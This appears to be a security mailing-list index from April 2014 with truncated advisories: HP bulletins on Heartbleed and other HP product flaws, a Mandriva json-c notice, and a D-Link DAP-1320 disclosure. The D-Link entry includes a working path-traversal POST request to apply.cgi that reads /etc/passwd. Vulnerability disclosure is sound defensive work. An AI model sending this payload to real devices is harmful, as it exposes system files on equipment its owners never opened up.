security-alert | 17 Apr 20:34 2014

[security bulletin] HPSBMU02995 rev.3 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04236102
Version: 3

HPSBMU02995 rev.3 - HP Software HP Service Manager, Asset Manager, UCMDB
Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation,
Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-11
Last Updated: 2014-04-17

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a third-party product that is embedded in some HP Software
products. The objective of this bulletin is to notify HP Software customers
about products affected by the Heartbleed vulnerability.

security-alert | 17 Apr 19:46 2014

[security bulletin] HPSBMU02998 rev.2 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information, Denial of Service (DoS)


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239372

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04239372
Version: 2

HPSBMU02998 rev.2 - HP System Management Homepage (SMH) running OpenSSL on
Linux and Windows, Remote Disclosure of Information, Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-13
Last Updated: 2014-04-17

Potential Security Impact: Remote disclosure of information, Denial of
Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities
could be exploited remotely resulting in Denial of Service (DoS). Also
included is the OpenSSL vulnerability known as "Heartbleed" which could be
exploited remotely resulting in disclosure of information.

security-alert | 17 Apr 16:02 2014

[security bulletin] HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04250814

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04250814
Version: 1

HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL
Vulnerability, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a third-party product that is embedded in some HP Software
products. The objective of this bulletin is to notify HP Software customers
about products affected by the Heartbleed vulnerability.

NOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found

security | 17 Apr 11:02 2014

[ MDVSA-2014:079 ] json-c


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:079
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : json-c
 Date    : April 17, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated json-c packages fix security vulnerabilities:

 Florian Weimer reported that the printbuf APIs used in the json-c
 library used ints for counting buffer lengths, which is inappropriate
 for 32-bit architectures. These functions need to be changed to use
 size_t if possible for sizes, or to be hardened against negative
 values if not. This could be used to cause a denial of service in
 an application linked to the json-c library (CVE-2013-6370).

 Florian Weimer reported that the hash function in the json-c library
 was weak, and that parsing smallish JSON strings showed quadratic
 timing behaviour. This could cause an application linked to the json-c
 library, and that processes some specially-crafted JSON data, to use
 excessive amounts of CPU (CVE-2013-6371).
 _______________________________________________________________________


kyle Lovett | 17 Apr 08:50 2014

D-Link DAP-1320 Wireless Range Extender Directory Traversal and XSS Vulnerabilities

D-Link's DAP-1320 Wireless Range Extender suffers from both a
directory traversal and an XSS vulnerability on all firmware versions
(current v. 1.20B07).

---------------------------------------------------------------------------------------------------------------------
Directory Traversal
CWE-22: Path Traversal

The POST param 'html_response_page' of apply.cgi suffers from a
directory traversal vulnerability.

The following example will display the contents of /etc/passwd:

http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded

POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D
HTTP/1.1

---------------------------------------------------------------------------------------------------------------------
XSS
CWE-79: Cross Site Scripting

The POST param 'html_response_page' of apply.cgi suffers from an XSS
vulnerability.

Example:


security-alert | 17 Apr 05:11 2014

[security bulletin] HPSBMU02935 rev.2 - HP LoadRunner Virtual User Generator, Remote Code Execution, Disclosure of information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03969437

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03969437
Version: 2

HPSBMU02935 rev.2 - HP LoadRunner Virtual User Generator, Remote Code
Execution, Disclosure of information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-10-30
Last Updated: 2014-04-17

Potential Security Impact: Remote code execution, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP LoadRunner
Virtual User Generator. The vulnerabilities could be exploited to allow
remote code execution and disclosure of information.

References:
CVE-2013-4837 (ZDI-CAN-1832, SSRT101191)

security-alert | 17 Apr 04:54 2014

[security bulletin] HPSBMU02987 rev.1 - HP Universal Configuration Management Database Integration Service, Remote Code Execution


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04219959

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04219959
Version: 1

HPSBMU02987 rev.1 - HP Universal Configuration Management Database
Integration Service, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Remote code execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Universal
Configuration Management Database Integration Service. The vulnerability
could be exploited to allow remote execution of code.

References:
CVE-2013-6215 (SSRT101372, ZDI-CAN-1977)

security-alert | 17 Apr 04:38 2014

[security bulletin] HPSBMU02988 rev.1 - HP Universal Configuration Management Database, Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04220407

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04220407
Version: 1

HPSBMU02988 rev.1 - HP Universal Configuration Management Database,
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Disclosure of Information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Universal
Configuration Management Database Integration Service. The vulnerability
could be exploited to allow disclosure of information.

References:
CVE-2013-6214 (ZDI-CAN-2042, SSRT101373)

security-alert | 17 Apr 04:12 2014

[security bulletin] HPSBMU02982 rev.1 - HP Database and Middleware Automation, Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04201408

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04201408
Version: 1

HPSBMU02982 rev.1 - HP Database and Middleware Automation, Disclosure of
Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Database and
Middleware Automation (DMA). The vulnerability could be remotely exploited
resulting in disclosure of information.

References: CVE-2013-6212 (SSRT101475)


security-alert | 17 Apr 02:15 2014

[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04248997

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04248997
Version: 1

HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL
Vulnerability, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-16
Last Updated: 2014-04-16

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a third-party product that is embedded in some HP Software
products. The objective of this bulletin is to notify HP Software customers
about products affected by the Heartbleed vulnerability.

NOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found

security-alert | 16 Apr 22:51 2014

[security bulletin] HPSBMU02996 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04026039

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04026039
Version: 1

HPSBMU02996 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux,
Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-15
Last Updated: 2014-04-15

Potential Security Impact: Remote unauthorized access, execution of arbitrary
code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Network Node
Manager I (NNMi) on HP-UX, Linux, Solaris, and Windows. This vulnerability
could be remotely exploited resulting in unauthorized access or execution of
arbitrary code.
